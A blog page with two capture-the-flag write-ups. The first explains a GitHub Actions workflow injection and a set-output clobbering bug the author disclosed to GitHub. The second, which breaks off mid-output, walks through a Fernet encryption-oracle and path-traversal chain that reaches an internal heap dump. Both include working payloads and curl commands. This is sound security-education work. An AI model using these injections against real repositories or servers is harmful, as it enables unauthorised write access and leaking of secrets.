The GitHub Capture-the-Flag - Call to Hacktion concluded in March 2021, and I was pleasantly surprised to be the first person to complete the challenge! I was intending to do a short writeup on the challenge back then, but the official writeup by GitHub had already explained the vulnerabilities and the solution.

There were some parts which I did not fully understood even after solving the challenge, and I want to take this chance to revisit some of the missed steps. I will also discuss a bug which I chanced upon while performing this deep-dive analysis. Hopefully this article helps to provide deeper insights into the internals of GitHub Actions and explain the whole exploit chain in detail, as well as raise awareness about the dangers of logging untrusted inputs in GitHub Actions.

Introduction

Call to Hacktion is a CTF hosted by GitHub Security Lab that ran from 17 March 2021 to 21 March 2021. The challenge is to exploit a vulnerable GitHub Actions workflow in a player-instanced private repository. Contestants are given read-only access to the repository, and the goal is to exploit the vulnerable workflow to overwrite README.md on the main branch to prove that the contestant had successfully obtained write privileges to the repository (i.e. read-only access -> privilege escalation -> read-write access).

Vulnerable Workflow Analysis

Without further ado, let’s jump straight into the vulnerable workflow (.github/workflows/comment-logger.yml) in the player-instanced challenge repository:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
name: log and process issue comments
on:
  issue_comment:
    types: [created]

jobs:
  issue_comment:
    name: log issue comment
    runs-on: ubuntu-latest
    steps:
      - id: comment_log
        name: log issue comment
        uses: actions/github-script@v3
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
          COMMENT_ID: ${{ github.event.comment.id }}
        with:
          github-token: "deadc0de"
          script: |
            console.log(process.env.COMMENT_BODY)
            return process.env.COMMENT_ID
          result-encoding: string
      - id: comment_process
        name: process comment
        uses: actions/github-script@v3
        timeout-minutes: 1
        if: ${{ steps.comment_log.outputs.COMMENT_ID }}
        with:
          script: |
            const id = ${{ steps.comment_log.outputs.COMMENT_ID }}
            return ""
          result-encoding: string

If you have been following GitHub Security Lab’s research articles, you may have came across this article by Jaroslav Lobacevski on code/command injection in workflows. Essentially, it is not recommended to use GitHub Actions expression syntax referencing potentially untrusted input in inline scripts, as this can easily lead to code/command injections. On line 30 – const id = ${{ steps.comment_log.outputs.COMMENT_ID }}, it can be seen that a GitHub Actions expression that references an output from a previous job step is being used directly within the inline script. This looked suspicious, and code injection may be possible if the expression value can be controlled by an adversary.

Let’s move on to examine the referenced job step (comment_log) and determine how code injection could be achieved:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
- id: comment_log
  name: log issue comment
  uses: actions/github-script@v3
  env:
    COMMENT_BODY: ${{ github.event.comment.body }}           // attacker-controlled data
    COMMENT_ID: ${{ github.event.comment.id }}               // safe numerical ID generated by GitHub
  with:
    github-token: "deadc0de"
    script: |
      console.log(process.env.COMMENT_BODY)                  // untrusted input logged to standard output!
      return process.env.COMMENT_ID                          // safe value returned
    result-encoding: string
- id: comment_process
  name: process comment
  uses: actions/github-script@v3
  timeout-minutes: 1
  if: ${{ steps.comment_log.outputs.COMMENT_ID }}            // if this output is set from previous job
  with:
    script: |
      const id = ${{ steps.comment_log.outputs.COMMENT_ID }} // fill output value here!
      return ""
    result-encoding: string

Here, the actions/github-script@v3 action is being used. Basically, this action accepts a script argument passed using with: in the workflow file and executes it, allowing easy access to GitHub API and workflow run context. Notice that the comment body is being logged to standard output in the inline script – the attacker controlled data (comment body) ends up being printed to standard output! Using a feature of GitHub Actions known as workflow commands, the action can interact with the Actions runner. It works by parsing the output of the execution step and handling any commands denoted by any output line starting with :: after trimming leading whitespaces.

This means that when an output line such as ::set-output name=[name]::[value] is being logged, it would be possible to access the output value using ${{ steps.[job_id].outputs.[name] }}. In the vulnerable workflow above, it can be seen that it would be possible for an adversary to set ${{ steps.comment_log.outputs.COMMENT_ID }} such that it leads to a code injection in the comment_process step.

To solve the challenge, we first close the const id = variable assignment with 1; and inject JavaScript code using the pre-authenticated octokit/core.js to push a new commit overwriting README.md using GitHub REST API. I ended up with the following solution:

::set-output name=COMMENT_ID::1; console.log(context); console.log(process); await github.request('PUT /repos/{owner}/{repo}/contents/{path}', { owner: 'incrediblysecureinc', repo: 'incredibly-secure-Creastery', path: 'README.md', message: 'Escalated to Read-write Access', content: Buffer.from('Pwned!').toString('base64'), sha: '959c46eb0fbab9ab5b5bfb279ab6d70f720d1207' })

Note: console.log(context); console.log(process); is added purely for debugging and is not actually required to exploit the vulnerable workflow. 959c46eb0fbab9ab5b5bfb279ab6d70f720d1207 refers to the SHA for the git blob (README.md) being updated.

Why Did The Exploit Worked?

Now, we have successfully exploit the vulnerable workflow and solved the challenge. But, we have yet to understand why it worked under the hood.

Let’s continue by enabling logging in the Actions runner. To enable logging, follow the steps in the documentation and set the following repository secrets:

  • ACTIONS_RUNNER_DEBUG to true
  • ACTIONS_STEP_DEBUG to true

Since participants were given read-only access to the repository, it is not possible to set the secrets in the player-instanced repository. I proceeded to create a private test repository, added the debug repository secrets and imported the vulnerable workflow file.

After supplying a test comment, the workflow runs successfully with the following log:

...
##[debug]Starting: log issue comment
##[debug]Loading inputs
##[debug]Loading env
##[group]Run actions/github-script@v3
with:
  github-token: deadc0de
  script: console.log(process.env.COMMENT_BODY)
  return process.env.COMMENT_ID
  result-encoding: string
  debug: false
  user-agent: actions/github-script
env:
  COMMENT_BODY: Test
  COMMENT_ID: 802762169
##[endgroup]
test
::set-output name=result::802762169
##[debug]steps.comment_log.outputs.result='802762169'
##[debug]Node Action run completed with exit code 0
##[debug]Finishing: log issue comment
...

It turns out that the return process.env.COMMENT_ID does not set ${{ steps.comment_log.outputs.COMMENT_ID }} after all!
In fact, the comment_process step is referencing a supposedly non-existent output from the comment_log.

However, we do see ${{ steps.comment_log.outputs.result }} being set. Upon examining the source code of actions/github-script@v3, it is clear why this is the case:

...
const result = await callAsyncFunction(
  {require: require, github, context, core, io},
  script
)

...

core.setOutput('result', output)
...

What Could Go Wrong With Logging Untrusted Inputs? :see_no_evil:

One interesting thought I had was that, what if the workflow relied on outputs.result instead. Is the below modified workflow vulnerable?

...
    uses: actions/github-script@v3
    script: |
      console.log(process.env.COMMENT_BODY)
      return process.env.COMMENT_ID
    result-encoding: string
...
  - id: comment_process
    name: process comment
    uses: actions/github-script@v3
    timeout-minutes: 1
    if: ${{ steps.comment_log.outputs.result }}              // instead of outputs.COMMENT_ID
    with:
      script: |
        const id = ${{ steps.comment_log.outputs.result }}   // instead of outputs.COMMENT_ID
        return ""
      result-encoding: string

The answer is no – if set-output workflow command is executed multiple times for the same output name, only the last value is retained.

Notice that in the above workflow, a trailing newline is enforced implicitly when using console.log().

Now, let’s consider a similar workflow that instead logs untrusted input using process.stdout.write(). Is this vulnerable?

...
    uses: actions/github-script@v3
    script: |
      process.stdout.write(process.env.COMMENT_BODY)         // no trailing newline here
      return process.env.COMMENT_ID                          // does this overwrite existing ::set-output?
    result-encoding: string
...
  - id: comment_process
    name: process comment
    uses: actions/github-script@v3
    timeout-minutes: 1
    if: ${{ steps.comment_log.outputs.result }}              // instead of outputs.COMMENT_ID
    with:
      script: |
        const id = ${{ steps.comment_log.outputs.result }}   // instead of outputs.COMMENT_ID
        return ""
      result-encoding: string

This is a tricky question. I was not sure either, but it turns out this workflow is actually vulnerable!

But why? The Actions Runner reads each line of the step output, parses and executes any workflow commands (lines starting with the :: marker) detected. In the above workflow, the output from process.stdout.write(process.env.COMMENT_BODY) will be concatenated with the output from core.setOutput('result', output) triggered under the hood by the return statement in the inline script.

In other words, if the following comment body is supplied:

::set-output name=result::1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);
JUNK

Note: There is no no trailing newline after JUNK.

The output shown in the job execution logs is:

::set-output name=result::1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);
##[debug]steps.comment_log.outputs.result='1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);'
JUNK::set-output name=result::802762169
##[debug]Node Action run completed with exit code 0
...
This should not be executed -- proof that we indeed have code injection: 1337

Observe that the ::set-output workflow command issued for the return value of the script does not enforces a leading newline prior to being concatenated with the logged untrusted input. This means that we can prevent the return statement from successfully setting the result step output by clobbering the ::set-output command with the untrusted input.

Examining the source code for @actions/core, we can see why this happens:

export function issueCommand(
  command: string,
  properties: CommandProperties,
  message: any
): void {
  const cmd = new Command(command, properties, message)
  process.stdout.write(cmd.toString() + os.EOL) // leading newline not guaranteed
}

As a result of the missing prepended newline, users who mistakenly trust the output of ${{ steps.*.outputs.result }} set by @actions/github-script through @actions/core may end up working with an untrusted value in subsequent job execution steps, which may lead to remote code/command execution and privilege escalation in seemingly secure workflows.

This issue was reported to GitHub via HackerOne and was resolved through the release of an interim solution to prepend a newline in all cores to core.setOutput():

  • @actions/core v1.2.7 [PR]
  • actions/github-script v4.0.2 [PR]

Admittedly, while the interim solution is necessary, it is far from perfect as workflows/actions using core.setOutput() under the hood may cause a lot of unnecessary newlines to appear in the job execution logs. In the future, this issue may be properly addressed with the complete removal of standard output command processing:

“To address the wider risks you bring up more holistically, we’re planning on removing stdout comand processing altogether in favor of a true CLI interface you’d need to explicitly choose to invoke to perform workflow commands. So long as info written to stdout can influence the runtime of an action, it’s no longer safe to print untrusted data to logs (and that’s certainly not a reasonable expectation to set for users of Actions). We may make some of this behavior more strict in the meantime, but long term we’re planning on tearing it out.”

Disclosure Timeline

  • March 23, 2021 – Reported to GitHub Bug Bounty program on HackerOne
  • March 24, 2021 – GitHub – Initial acknowledgement of report
  • April 12, 2021 – Enquired on the status of the report
  • April 12, 2021 – GitHub – Provided update that their engieering teams are still working on triaging this issue
  • April 17, 2021 – GitHub – Asked to review the pull request on @actions/toolkit to implement the interim fix prior to removal of standard output processing of set-output, and informed about long term plan to remove support for standard output processing
  • April 18, 2021 – Verified interim fix in @actions/core is correct, but noted that the dependency of actions/github-script is not updated accordingly. Agreed that depreciating standard output command processing is a good move to eliminate such unexpected vulnerabilities caused by logging untrusted inputs.
  • June 19, 2021 – GitHub – Resolved report and awarded bounty

Conclusion

In the past, there had been security concerns over the workflow commands being parsed and executed by the Actions runner, which leads to unexpected modification of environment variables/path injection and resulting in remote code/command execution in workflows. To mitigate such risks, the GitHub team decided to depreciate several workflow commands. It is strongly recommended to disable workflow commands processing prior to logging any untrusted input to avoid any unexpected behaviour!

Thanks to GitHub Security Lab team for creating this awesome challenge and for the bounty! Taking part in this challenge helped immensely in solidifying my understanding of GitHub Actions and security considerations one should make when creating workflows.

Recently, BugPoC had teamed up with @NahamSec and announced a memory leak challenge sponsored by Amazon on Twitter. The vulnerabilities presented in the challenge are rather realistic. In fact, I did encounter such vulnerabilities a couple of times while doing bug hunting on web applications! Besides presenting a walkthrough of the challenge in this write-up, I will also discuss alternative solutions and include some tips as well. Do read on if you are interested! :smile:

Introduction

The goal of the challenge is to find an insecurely insecurely stored Python variable called SECRET_API_KEY somewhere on the server – http://doggo.buggywebsite.com.

Let’s start by finding out more information about the challenge site provided.

$ dig doggo.buggywebsite.com +short any
doggo.buggywebsite.com.s3-website-us-west-2.amazonaws.com

It seems to be a Amazon S3 website. If the S3 bucket is misconfigured, we could possibly discover new information stored in the bucket, or even mess around with the files in the bucket. You can use a tool such as BucketScanner by @Rzepsky to check for common S3 bucket misconfigurations. Unfortunately, this bucket is not misconfigured, so let’s go back to the challenge site itself.

Visiting the challenge site at http://doggo.buggywebsite.com/, we can see a few images of dogs. Let’s examine the JavaScript file loaded (script.js) to better understand how the images are fetched dynamically:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
const API_ENDPOINT = "https://doggo-api.buggywebsite.com";

async function getURLs(pageNum){
  var PARAMS = {
    1: "gAAAAABgGg49vp03MkS2gsuz1SLZat7_z36Nkc4I-25X4-RtxXd_pxv964ObmIgunslqWO47kWxCWUSdZVCSlgqGnTi7ekqEaA==",
    2: "gAAAAABgGg5OwIOIQGgUJSF_iuwDa8XcB8im0v3l7S-cwZgkufRFsfb5EL4Dawc3ZA_xwyG8BkbIkMnFrl6ACVGzmd_9adDMfA==",
    3: "gAAAAABgGg5dGZ3R5ZHcBV3A4L2QM3-LMxsmbLFTSXWmBiXTa9BgAN8ZhmDQDONVaf7VT_s1CMK-uL8huNQy1wwfQovk1t7Jfw==",
    4: "gAAAAABgGg5u4W_yBC5YgusPCtmKOtxQYAgo161YK_Njo67ZLo6fGm6nyKwRIQ8divqkUL2mymw2fxeKF_BenpqSo79KuMj6JQ=="
  };
  var param = PARAMS[pageNum];
  var endpoint = API_ENDPOINT + '/get-dogs';

  let response = await fetch(endpoint, {
    headers: {
      'x-param': param,
      'x-fingerprint': localStorage.fingerprint,
    }
  });
  let data = await response.json()
  return data['body'];

}

function addImages(urls){
  var div = document.getElementById('images-div');
  div.innerHTML = '';
  for (var i = 0; i < urls.length; i++){
    var img = document.createElement('img');
    img.setAttribute('class', 'pretty-img');
    img.setAttribute('src', urls[i]);
    div.appendChild(img)
    div.appendChild(document.createElement('br'))
  }
}

function loadPage(pageNum){
  document.querySelector('#theLoader').style.display='inline';
  var buttons = document.getElementsByClassName('page-button');
  for (var i = 0; i < buttons.length; i++){
    buttons[i].disabled = false;
  }
  getURLs(pageNum).then(urls => {
    addImages(JSON.parse(urls));
    document.getElementById('button-'+pageNum).disabled = true;
    document.querySelector('#theLoader').style.display='none';
  })
}

async function setFingerprint(){
  if (localStorage.fingerprint == undefined) {
    document.querySelector('#theLoader').style.display='inline';
    var endpoint = API_ENDPOINT + '/fingerprint';
    let response = await fetch(endpoint);
    let data = await response.json()
    localStorage.fingerprint = data['fingerprint'];
  }
}

function initPage(){
  setFingerprint().then(_ => {
    loadPage(1);
  })
}

It seems that there is an API server at https://doggo-api.buggywebsite.com. This API server should be the actual target since the goal is to achieve some form of memory leakage, which we can’t really achieve on http://doggo.buggywebsite.com (a static website hosted on a S3 bucket).

Also, two endpoints can also be observed from the JavaScript code, namely:

  • /get-dogs– an endpoint accepting an encrypted x-param header value and loading different pages of dogs
  • /fingerprint – an endpoint used to obtain some value for fingerprinting the current user.

You may have also noticed that there are four Base-64 encoded strings starting with gAAAAAB. Decoding it yields binary data, indicating that the value may have been encrypted prior to being encoded. Doing a quick search on this substring reveals that this is likely to be using Fernet, an symmetric encryption module commonly used in building Python applications.

Since we do not know the secret key used to create the ciphertext, we cannot decrypt the ciphertext ourselves. There aren’t any relevant known weaknesses in Fernet that allows us to encrypt/decrypt text as well, so let’s just keep these information in mind and move on to examine the other information we just gathered.

/get-dogs Endpoint

Tracing the JavaScript code, we can see whenever a page is requested, a fingerprint value is first obtained from /fingerprint followed by requesting the list of images to load by querying the /get-dogs endpoint with the respective Base-64 encrypted value.

Let’s try to replicate this behaviour to better understand the application flow. We start by obtaining a valid fingerprint value:

$ curl -s -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkm96w1MoKBnTslSzxiHX3VgcK-9j5ETD41Z0Q7zUm-gMCkNUdrJdg10n6l0SKxtmos5CrN4kkYACudYKcx_OGW3eezJ6ScQ3DHx_Sxr9kMavb5NTDKDO57iQPxNwu3DJGw_Sh1uok3McF-rEjTwd9ybzDbWfyFYYS9Ka-Gq6uAzHiNl9Z9sujy5XFUBoAcmEfoatp_Tl3LHCBv7Dbn0Et5YqPe5gxbRlDkvjqyw73nOJD7k=

Then, we attempt to request the dog images for all four Base-64 encoded strings we discovered earlier on.

$ echo 'gAAAAABgGg49vp03MkS2gsuz1SLZat7_z36Nkc4I-25X4-RtxXd_pxv964ObmIgunslqWO47kWxCWUSdZVCSlgqGnTi7ekqEaA==' > 1.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 1.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=1", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog1.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog2.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog3.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog4.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog5.jpg\"]"}

$ echo 'gAAAAABgGg5OwIOIQGgUJSF_iuwDa8XcB8im0v3l7S-cwZgkufRFsfb5EL4Dawc3ZA_xwyG8BkbIkMnFrl6ACVGzmd_9adDMfA==' > 2.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 2.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=2", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog6.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog7.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog8.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog9.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog10.jpg\"]"}

$ echo 'gAAAAABgGg5dGZ3R5ZHcBV3A4L2QM3-LMxsmbLFTSXWmBiXTa9BgAN8ZhmDQDONVaf7VT_s1CMK-uL8huNQy1wwfQovk1t7Jfw==' > 3.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 3.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=3", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog11.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog12.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog13.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog14.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog15.jpg\"]"}

$ echo 'gAAAAABgGg5u4W_yBC5YgusPCtmKOtxQYAgo161YK_Njo67ZLo6fGm6nyKwRIQ8divqkUL2mymw2fxeKF_BenpqSo79KuMj6JQ==' > 4.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 4.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=4", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog16.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog17.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog18.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog19.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog20.jpg\"]"}

Notice that the paths in the responses are largely similar. From our above testing, we can infer that the encrypted value likely contains /dogs?page=1, or perhaps simply ?page=1. Besides that, we also have two new discoveries:

  1. We now know that there is yet another endpoint on this API server – /dogs
  2. We found another S3 bucket at buggy-dog-pics.s3-us-west-2.amazonaws.com (spoiler: nothing much here, really :joy:)

Internal Endpoints

Let’s try to access the /dogs endpoint directly:

$ curl https://doggo-api.buggywebsite.com/dogs
Error, this endpoint is only internally accessible

It seems like this is an endpoint accessible via the internal network only. It’s worth nothing that we could fiddle around with headers such as X-Forwarded-For: 127.0.0.1 to trick the application into thinking that we are making the request from an internal network and be able to access the endpoint, but in this case the server isn’t vulnerable to such attacks.

Let’s move on to fuzz for other endpoints and see what we can do with them:

$ ffuf -u 'https://doggo-api.buggywebsite.com/FUZZ' -w ./SecLists/Discovery/Web-Content/quickhits.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : https://doggo-api.buggywebsite.com/FUZZ
 :: Wordlist         : FUZZ: ./SecLists/Discovery/Web-Content/quickhits.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

/heapdump               [Status: 401, Size: 50, Words: 7, Lines: 1]

Looks suspicious. Let’s check the response of the /heapdump endpoint:

$ curl https://doggo-api.buggywebsite.com/heapdump
Error, this endpoint is only internally accessible

We discovered another internal endpoint! But now what? What else can we do? :thinking:

Encryption & Decryption Oracles

Recall that earlier, we had to generate a fingerprint before using the /get-dogs endpoint to fetch the respective page of dog images. Let’s take a closer look at the endpoint request and response again carefully:

$ curl -s -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkm96w1MoKBnTslSzxiHX3VgcK-9j5ETD41Z0Q7zUm-gMCkNUdrJdg10n6l0SKxtmos5CrN4kkYACudYKcx_OGW3eezJ6ScQ3DHx_Sxr9kMavb5NTDKDO57iQPxNwu3DJGw_Sh1uok3McF-rEjTwd9ybzDbWfyFYYS9Ka-Gq6uAzHiNl9Z9sujy5XFUBoAcmEfoatp_Tl3LHCBv7Dbn0Et5YqPe5gxbRlDkvjqyw73nOJD7k=

Notice that the fingerprint returned in the JSON response starts with gAAAAAB too, indicating that the string may very well be a ciphertext produced using Fernet! What if we try to supply this fingerprint value as the x-param header value instead of one of the four pre-defined Base-64 strings?

$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

Interesting! It looks like we are able to successfully decrypt the fingerprint value. This indicates that the encryption key used for generating the four hardcoded Base-64 strings in the JavaScript file is also the same for generating the encrypted fingerprint value.

We can infer the following from the above output:

  • The fingerprint contains a serialised JSON object: {"UA": request.headers["User-Agent"]}.
  • The /get-dogs endpoint creates an URL to be fetched on the server-side by concatenating the protocol (e.g. http://), backend host (e.g. localhost), port (e.g. 80), the string /dogs, and the decrypted x-param header value. In other words, the server-side request URL is formed using: 'http://localhost:80/dogs' + decrypt(request.headers['x-param']).

In addition, we now know that we have a encryption oracle (using /fingerprint endpoint with a custom User-Agent header value) and a decryption oracle (using /get-dogs endpoint with a custom x-param header value containing the ciphertext). These provides us powerful primitives – we can create valid ciphertexts for our chosen plaintext (although with some data prepended/appended due to JSON serialisation) and use the generated ciphertexts to tamper with the request path in the server-side request!

Getting to the /heapdump

Let’s take a closer look at how we can tamper with the request path:

$ curl -s -H 'User-Agent: TEST' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgku7UVOl_To_pUd7J1qzYfOJvbEhVqpa_7DN_7m5YZI0np1jfXoVzWSRROrWQy4bxWuYylza3pUMZffRv5DZ2DPQZsA==
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"TEST\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

Since we can’t modify the prepended /dogs string, the server-side request will always use a relative path beginning with /dogs. What we can do is to perform a path traversal attack to access another endpoint besides /dogs as such:

  • Set User-Agent header value to /../heapdump#
  • This results in the URL to be requested to be something like: http://localhost/dogs{"UA": "/../heapdump#"}, which may be normalised by the webserver to be: http://localhost/heapdump.

Note: Since the hash fragment is not actually a part of a URL, it (usually) isn’t sent to the server. Most webservers also ignore the hash fragment, so we can effectively get rid of the trailing "} produced by the JSON serialisation. You could also use ? to force the trailing "} to be treated as a query string parameter, but some applications may not like that :)

Let’s try out the attack idea:

$ curl -s -H 'User-Agent: /../heapdump#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkvSr7zNtRXxDO14Y37625vSYXQ9Ma8YwdxnEuWyV9cxCVzprPIl60ped_DSlpq2l2QKuAXbbSvRu479zVF97tMj4A-W8IEu5I6qpruHDf2w8Bm8
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/heapdump#\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

It seems like ../ is being stripped from the request path. There’s actually two bypasses for it.

The first solution is that because ../ is only stripped once globally and not done recursively, supplying ..././ will end up being ../, which is exactly what we wanted!

The second solution is to use a URL-encoded path traversal payloads such as ..%2f, .%2e/, %2e%2e%2f instead of ../. This works because the most webservers URL-decodes the request path before routing it to the application. We can easily verify this behaviour is indeed existent:

$ curl https://doggo-api.buggywebsite.com/fingerprint/..%2fdogs
Error, this endpoint is only internally accessible

Clearly, we ended up getting routed to the /dogs internal endpoint instead of the publicly-accessible /fingerprint endpoint, proving that this is indeed working.

Now, let’s go get the flag!

$ curl -s -H 'User-Agent: /..%2fheapdump#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkvWY5SmGJUpySKZn2AjGP27q41C6DKljy3Xkg08fQZfvnvSCbAse2k_Dmx_JaVKN-QaOzgSQq2Nz_pIpDTUYMdhbdd_kjH9q1d1llgnKoECvB7o=
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/..%2fheapdump#\"}", "statusCode": 200, "body": "\"name,size,value;__name__,57,lambda_function;__doc__,56,None;__package__,60,;__loader__,59,<_frozen_importlib_external.SourceFileLoader object at 0x7f9e042319a0>;__spec__,57,ModuleSpec(name='lambda_function', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7f9e042319a0>, origin='/var/task/lambda_function.py');__file__,57,/var/task/lambda_function.py;__cached__,59,/var/task/__pycache__/lambda_function.cpython-38.pyc;__builtins__,61,{'__name__': 'builtins', '__doc__': \\\"Built-in functions, exceptions, and other objects.\\\\n\\\\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.\\\", '__package__': '', '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': ModuleSpec(name='builtins', loader=<class '_frozen_importlib.BuiltinImporter'>), '__build_class__': <built-in function __build_class__>, '__import__': <built-in function __import__>, 'abs': <built-in function abs>, 'all': <built-in function all>, 'any': <built-in function any>, 'ascii': <built-in function ascii>, 'bin': <built-in function bin>, 'breakpoint': <built-in function breakpoint>, 'callable': <built-in function callable>, 'chr': <built-in function chr>, 'compile': <built-in function compile>, 'delattr': <built-in function delattr>, 'dir': <built-in function dir>, 'divmod': <built-in function divmod>, 'eval': <built-in function eval>, 'exec': <built-in function exec>, 'format': <built-in function format>, 'getattr': <built-in function getattr>, 'globals': <built-in function globals>, 'hasattr': <built-in function hasattr>, 'hash': <built-in function hash>, 'hex': <built-in function hex>, 'id': <built-in function id>, 'input': <built-in function input>, 'isinstance': <built-in function isinstance>, 'issubclass': <built-in function issubclass>, 'iter': <built-in function iter>, 'len': <built-in function len>, 'locals': <built-in function locals>, 'max': <built-in function max>, 'min': <built-in function min>, 'next': <built-in function next>, 'oct': <built-in function oct>, 'ord': <built-in function ord>, 'pow': <built-in function pow>, 'print': <built-in function print>, 'repr': <built-in function repr>, 'round': <built-in function round>, 'setattr': <built-in function setattr>, 'sorted': <built-in function sorted>, 'sum': <built-in function sum>, 'vars': <built-in function vars>, 'None': None, 'Ellipsis': Ellipsis, 'NotImplemented': NotImplemented, 'False': False, 'True': True, 'bool': <class 'bool'>, 'memoryview': <class 'memoryview'>, 'bytearray': <class 'bytearray'>, 'bytes': <class 'bytes'>, 'classmethod': <class 'classmethod'>, 'complex': <class 'complex'>, 'dict': <class 'dict'>, 'enumerate': <class 'enumerate'>, 'filter': <class 'filter'>, 'float': <class 'float'>, 'frozenset': <class 'frozenset'>, 'property': <class 'property'>, 'int': <class 'int'>, 'list': <class 'list'>, 'map': <class 'map'>, 'object': <class 'object'>, 'range': <class 'range'>, 'reversed': <class 'reversed'>, 'set': <class 'set'>, 'slice': <class 'slice'>, 'staticmethod': <class 'staticmethod'>, 'str': <class 'str'>, 'super': <class 'super'>, 'tuple': <class 'tuple'>, 'type': <class 'type'>, 'zip': <class 'zip'>, '__debug__': True, 'BaseException': <class 'BaseException'>, 'Exception': <class 'Exception'>, 'TypeError': <class 'TypeError'>, 'StopAsyncIteration': <class 'StopAsyncIteration'>, 'StopIteration': <class 'StopIteration'>, 'GeneratorExit': <class 'GeneratorExit'>, 'SystemExit': <class 'SystemExit'>, 'KeyboardInterrupt': <class 'KeyboardInterrupt'>, 'ImportError': <class 'ImportError'>, 'ModuleNotFoundError': <class 'ModuleNotFoundError'>, 'OSError': <class 'OSError'>, 'EnvironmentError': <class 'OSError'>, 'IOError': <class 'OSError'>, 'EOFError': <class 'EOFError'>, 'RuntimeError': <class 'RuntimeError'>, 'RecursionError': <class 'RecursionError'>, 'NotImplementedError': <class 'NotImplementedError'>, 'NameError': <class 'NameError'>, 'UnboundLocalError': <class 'UnboundLocalError'>, 'AttributeError': <class 'AttributeError'>, 'SyntaxError': <class 'SyntaxError'>, 'IndentationError': <class 'IndentationError'>, 